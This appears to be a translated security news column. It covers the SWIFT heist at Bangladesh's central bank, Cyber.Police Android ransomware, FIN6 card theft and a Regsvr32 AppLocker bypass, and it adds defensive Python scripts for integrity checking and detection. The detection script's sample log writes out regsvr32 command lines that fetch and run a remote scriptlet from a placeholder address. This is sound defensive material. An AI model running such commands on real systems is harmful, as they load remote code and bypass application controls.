
Financial cyber fraud usually hits ordinary people, bank customers, and the financial institutions themselves suffer only as a consequence. Because attacking user devices is easier than attacking banking infrastructure, everyone ends up paying for it. But there are exceptions: the Carbanak campaign discovered by our experts last year, the fresh attacks by Metel and GCMan, and the Carbanak 2.0 campaign, which is aimed more at banks' (large) clients. Add to this the high-tech robbery of the central bank of the Republic of Bangladesh in February of this year. Such attacks certainly require far more skill and experience than fraud against users' wallets, but the jackpot is far bigger too (as is the prison term, if luck runs out).
This week the bank robbery story continued: the technical details of the attack became known. It turned out that the robbers directly manipulated the software of the international payment system SWIFT. So it is not only a matter of one particular bank's vulnerable infrastructure: all large financial organizations are exposed to such an attack to varying degrees. I will return to the technique later; this story is worth telling from the beginning.
Technology alone, even the coolest, would not have got the crackers far: a theft of tens of millions of dollars will be noticed quickly in any case. The attack took place somewhere between February 4 and 5, on the eve of the weekend (which in Bangladesh falls on Friday and Saturday). A total of 32 transactions were made, for a total of under a billion dollars. Of these, 30 were identified and blocked; the bank managed that despite the day off. Two transfers, of $21 million and $80 million, to Sri Lanka and the Philippines respectively, went through.
The transfer to Sri Lanka was later returned thanks to a banal typo. Sending the funds to a local non-profit organization, the organizers of the attack misspelled the word "foundation" ("fandation" instead of "foundation"), and Deutsche Bank, acting as an intermediary, stopped the transaction "pending clarification". In the Philippines everything worked out for the attackers. The Bank of Bangladesh notified the local bank RCBC of the fraud, but where the attack itself had been made possible by Muslim holidays, the Chinese New Year prevented the Philippine bank's employees from acting in time. By the time everyone was back at work, someone had already withdrawn 58.15 million dollars from the account using false documents. I wonder what withdrawing $58 million from a bank account even looks like.
Details of the attack became known only recently. On April 22 the local police shared their data, and according to officials there was... no security at the bank. Physical security was not bad: all operations with the SWIFT system were carried out from a separate and, apparently, carefully guarded room, and reports on all electronic transactions had to be printed out.
At the network level, judging by the police's scant statements, SWIFT operations were isolated either poorly or not at all. Second-hand ten-dollar switches were mentioned, as was the lack of a firewall (apparently between the SWIFT infrastructure and everything else, the Internet included). The police tend to blame both the bank itself and the representatives of the international payment system: the latter discovered that SWIFT operations were unprotected only when it was already too late. Quite predictably, the bank could not work out how the leak happened (or what it all was) until outside experts were invited to analyze it. This, by the way, is the difference between having protection systems and not having them (or implementing them incorrectly): a protected system can be hacked too, but in an unprotected one the traces can also be covered so as to make any later investigation as difficult as possible.
Now to the technique. A detailed analysis of the attack tools was carried out by BAE Systems, and it revealed a direct attack on the specialized SWIFT software. The robbers could have acted differently: seized control of a computer connected to the payment system and made the transfers "by hand". Instead they chose a more difficult but more reliable path. The malicious code intercepted SWIFT system messages and searched them for predefined sequences of characters; in general, it conducted reconnaissance.
For the attack the crackers replaced standard modules of the payment system and cut out some of the checks. An illustrative example is given: to disable one of the checks, which the fraudulent transfer presumably could not have passed, it was enough to change two bytes, removing a conditional jump from the code.
The additional security measure, mandatory printing of transactions on a printer, also turned out to be easy to defeat. For printing, the system generates files with the necessary information, and the malware simply overwrote those files with zeros, so it not only blocked the printing but also erased the information in digital form.
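Two of the techniques described above, replacing or patching a module of the payment software and zeroing the print files, are exactly what a file-integrity check on the SWIFT host would catch. The following Python script is an added example, not code from the article, from BAE Systems or from SWIFT: it checks a directory of modules against a known-good SHA-256 manifest and flags print-spool files that consist entirely of zero bytes. The directory layout, file names and file contents are constructed placeholders; the two-byte NOP patch is only an illustration of the kind of change the article mentions.

```python
import hashlib
import tempfile
from pathlib import Path

CHUNK = 65536


def sha256_file(path: Path) -> str:
    """Stream a file through SHA-256 so large binaries need not be read at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(CHUNK), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_manifest(module_dir: Path, manifest: dict) -> list:
    """Compare every module listed in the known-good manifest with what is on disk.
    Returns (name, problem) pairs; an empty list means nothing was replaced or patched."""
    findings = []
    for name, expected in manifest.items():
        target = module_dir / name
        if not target.exists():
            findings.append((name, "missing"))
        elif sha256_file(target) != expected:
            findings.append((name, "hash mismatch"))
    return findings


def is_zero_filled(path: Path) -> bool:
    """True when a non-empty file consists only of 0x00 bytes (a wiped print job)."""
    if path.stat().st_size == 0:
        return False
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(CHUNK), b""):
            if chunk.count(0) != len(chunk):
                return False
    return True


def find_zeroed_print_files(print_dir: Path) -> list:
    """Names of print-spool files that have been overwritten with zeros."""
    return sorted(p.name for p in print_dir.iterdir() if p.is_file() and is_zero_filled(p))


def scan(root: Path, manifest: dict) -> dict:
    """Run both checks over a layout with 'modules' and 'print' subdirectories."""
    return {
        "tampered": verify_manifest(root / "modules", manifest),
        "zeroed": find_zeroed_print_files(root / "print"),
    }


def build_demo():
    """Construct a throwaway directory tree: one intact module, one module with two
    bytes changed, one normal print file and one wiped print file. Everything here is
    a constructed placeholder, not real payment-system software or data."""
    root = Path(tempfile.mkdtemp(prefix="integrity_demo_"))
    modules = root / "modules"
    prints = root / "print"
    modules.mkdir()
    prints.mkdir()

    clean = bytes(range(256)) * 4  # stand-in for a known-good module image
    (modules / "intact_module.bin").write_bytes(clean)

    patched = bytearray(clean)
    patched[100:102] = b"\x90\x90"  # two bytes changed: a conditional jump turned into NOPs (illustration)
    (modules / "patched_module.bin").write_bytes(bytes(patched))

    (prints / "txn_0001.prt").write_bytes(b"constructed sample confirmation text\n")
    (prints / "txn_0002.prt").write_bytes(b"\x00" * 512)  # wiped, as the malware did

    # Manifest recorded from the known-good build, before any tampering.
    good = hashlib.sha256(clean).hexdigest()
    manifest = {"intact_module.bin": good, "patched_module.bin": good}
    return root, manifest


if __name__ == "__main__":
    demo_root, demo_manifest = build_demo()
    print(scan(demo_root, demo_manifest))
```

The manifest must live somewhere the host's administrator account cannot silently rewrite (a separate monitoring machine, or a signed copy), otherwise an attacker who can swap the modules can update the expected hashes as well; a zero-filled file is also only one way to suppress a print job, so the check is a cheap first signal rather than a complete control.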
My colleagues at Threatpost asked SWIFT for a comment and received a response very similar to the usual reaction of financial organizations to fraud against ordinary customers. In essence: the attack revealed no vulnerabilities in the SWIFT infrastructure; it is about the client's insecure environment; in short, the problem is not on our side. And they are right, but it is the kind of rightness that helps nobody. I do not think there will be many such incidents, and most likely conclusions have already been drawn from this whole story: there are not that many places where a billion can be stolen in one fell swoop. But "consumer" cyber fraud, attacks on the customers of all sorts of banks, from mere mortals to small and large businesses, will only grow. It is harder to deal with, but necessary.
Unusual ransomware Trojan for Android with exploits included
News. Blue Coat research.
Ransomware for ordinary computers uses exploits to the full, though it is not limited to them. On mobile devices, until recently, the situation looked different: for the initial infection, attackers rely more on social engineering. But the threat landscape for Android is developing in the same spiral as attacks on the PC, only much faster. This means that the appearance of malware for smartphones and tablets that installs itself without the owner's help is inevitable. And it has appeared. A curious sample of such a ransomware Trojan was analyzed by experts at Blue Coat. The extortionist, known as Cyber.Police, attacks devices running Android 4.x, and it is a blocker rather than a cryptor: the data is not taken hostage, the device is simply locked, and the ransom is demanded in the form of iTunes gift cards worth $200.
Much more interesting is how the extortionist gets onto the device. Two exploits are used for this. The first, lbxslt, allows taking control of the device after viewing a site with an infected script in a regular browser. This exploit, along with a number of others, was stolen from Hacking Team last year. The second, known as Towelroot, exploits a vulnerability in Linux kernels up to 3.4.15 (CVE) and is in fact a modification of a once popular utility for gaining root rights. At this stage a malicious application, the Trojan itself, is installed, with the standard notifications about a new app appearing in the system suppressed.
According to Google's own figures, more than half of devices still run various versions of Android 4.x. In an interview with Threatpost, Blue Coat researcher Andrew Brandt compared this version of Android to Windows XP: in perception it is an outdated system, unsupported by most vendors and extremely vulnerable. Yet Windows XP was released 15 years ago, and the latest version of Android 4.x (KitKat) 2.5 years ago. Progress moves by leaps and bounds, but in this context that is somehow not inspiring at all.
Group FIN6 attacks POS terminals, successfully stole the data of 20 million credit cards
News. FireEye study.
FireEye's research on the activities of the group known as FIN6 reveals nothing new: yes, they hack point-of-sale terminals and steal money. Such operations follow the targeted-attack scenario: a suitable set of lockpicks is chosen for the victim's infrastructure, then the malware finds the specialized computers and begins intercepting data. The story is interesting in context. After similar attacks on the largest US retail chains (the Target network was the most prominent victim), the United States began a long and painful transition to the chip-card payment system common in Europe (and here at home).
EMV cards are much better protected and are not necessarily susceptible to FIN6-style attacks (although options are possible). So, in connection with this, US-oriented cybercrime has started a feast on a sinking ship. Companies that have introduced chip-and-PIN report a noticeable decrease in the number of fraud-related incidents, while those who are late report growth of 11% on average. Since buyers are not in the habit of refusing to shop in places that still swipe the magnetic stripe of credit cards, this temporary transitional period turns out to be more dangerous for residents and guests of the United States than the periods before or after it. However, the recommendation to use one-time cards for payments while travelling is unlikely to be withdrawn even when absolutely everyone has switched to chip cards.
What else happened:
The Windows built-in Regsvr32 can be used to download and run arbitrary code, bypassing security systems, AppLocker in particular. Fortunately, this is still a proof of concept from a researcher, and technically it cannot even be called a vulnerability; it is rather the use of standard system tools in an unnatural way.
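A defender's counterpart to that proof of concept is a detection over process-creation logs, since a legitimate regsvr32 run registers a local DLL and has no reason to fetch anything from the network. The following Python snippet is an added example, not from the article or from the researcher's PoC: it parses a few constructed process-creation records (the CSV layout, user names, file names and the 203.0.113.10 address are all invented) and flags regsvr32.exe launches that pass a remote URL, register the COM scriptlet host DLL, or are spawned by an Office application or browser.

```python
import re
from dataclasses import dataclass

# Constructed process-creation events in a simple CSV layout:
# timestamp,user,parent image,image,command line
SAMPLE_LOG = """\
2016-04-25T09:12:01Z,CORP\\alice,explorer.exe,C:\\Windows\\System32\\regsvr32.exe,regsvr32.exe /s "C:\\Program Files\\Vendor\\vendor.dll"
2016-04-25T09:14:37Z,CORP\\bob,winword.exe,C:\\Windows\\System32\\regsvr32.exe,regsvr32.exe /s /i:http://203.0.113.10/x.sct scrobj.dll
2016-04-25T09:20:05Z,CORP\\carol,cmd.exe,C:\\Windows\\System32\\regsvr32.exe,regsvr32.exe /u "C:\\Program Files\\Vendor\\vendor.dll"
2016-04-25T09:25:44Z,CORP\\dave,chrome.exe,C:\\Windows\\System32\\regsvr32.exe,regsvr32.exe /i:https://203.0.113.10/update.sct scrobj.dll
2016-04-25T09:30:12Z,CORP\\erin,explorer.exe,C:\\Windows\\System32\\notepad.exe,notepad.exe C:\\Users\\erin\\notes.txt
"""


@dataclass
class ProcEvent:
    ts: str
    user: str
    parent: str
    image: str
    cmdline: str


URL_RE = re.compile(r"https?://", re.IGNORECASE)
# COM scriptlet host; a regsvr32 run has no routine reason to register it.
SCRIPT_HOST_DLLS = ("scrobj.dll",)
# Parents from which a regsvr32 launch is unusual enough to warrant a look (assumed list).
RISKY_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                 "chrome.exe", "firefox.exe", "iexplore.exe")


def parse_log(text: str) -> list:
    """Split the constructed CSV records; the command line may itself contain commas,
    so only the first four separators are honoured."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, parent, image, cmdline = line.split(",", 4)
        events.append(ProcEvent(ts, user, parent.lower(), image, cmdline))
    return events


def regsvr32_reasons(ev: ProcEvent) -> list:
    """Heuristic reasons why this regsvr32 launch deserves attention; empty = looks routine."""
    if not ev.image.lower().endswith("regsvr32.exe"):
        return []
    reasons = []
    cl = ev.cmdline.lower()
    if URL_RE.search(cl):
        reasons.append("remote URL passed to regsvr32")
    if any(dll in cl for dll in SCRIPT_HOST_DLLS):
        reasons.append("script host DLL registered")
    if ev.parent in RISKY_PARENTS:
        reasons.append(f"launched by {ev.parent}")
    return reasons


def detect(events: list) -> list:
    """Return (event, reasons) pairs for every event that trips at least one heuristic."""
    hits = []
    for ev in events:
        reasons = regsvr32_reasons(ev)
        if reasons:
            hits.append((ev, reasons))
    return hits


if __name__ == "__main__":
    for ev, reasons in detect(parse_log(SAMPLE_LOG)):
        print(ev.ts, ev.user, "->", "; ".join(reasons))
```

The URL and parent heuristics are the ones that survive a renamed payload file, so they are worth keeping even where the DLL name check is noisy; in practice the rule should be fed from Sysmon or the Windows security log rather than a CSV, and the parent list tuned to what actually launches regsvr32 in the environment.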
Antiquities: "Astra-976"
A very dangerous resident encrypted virus. It writes itself into the COM files of the current directory when an infected file is run, and then into all COM files launched for execution. If the system clock shows 17 minutes past the hour when the infected file is started, the virus encrypts (XOR 55h) the partition table in the MBR of the hard drive. Intercepts int 21h. Contains the strings: "© AsTrA, 1991", "(2)".
Quote from the book "Computer viruses in MS-DOS" by Eugene Kaspersky, 1992, page 26.
Disclaimer: This column reflects only the personal opinion of its author. It may or may not coincide with the position of Kaspersky Lab. Depending on luck.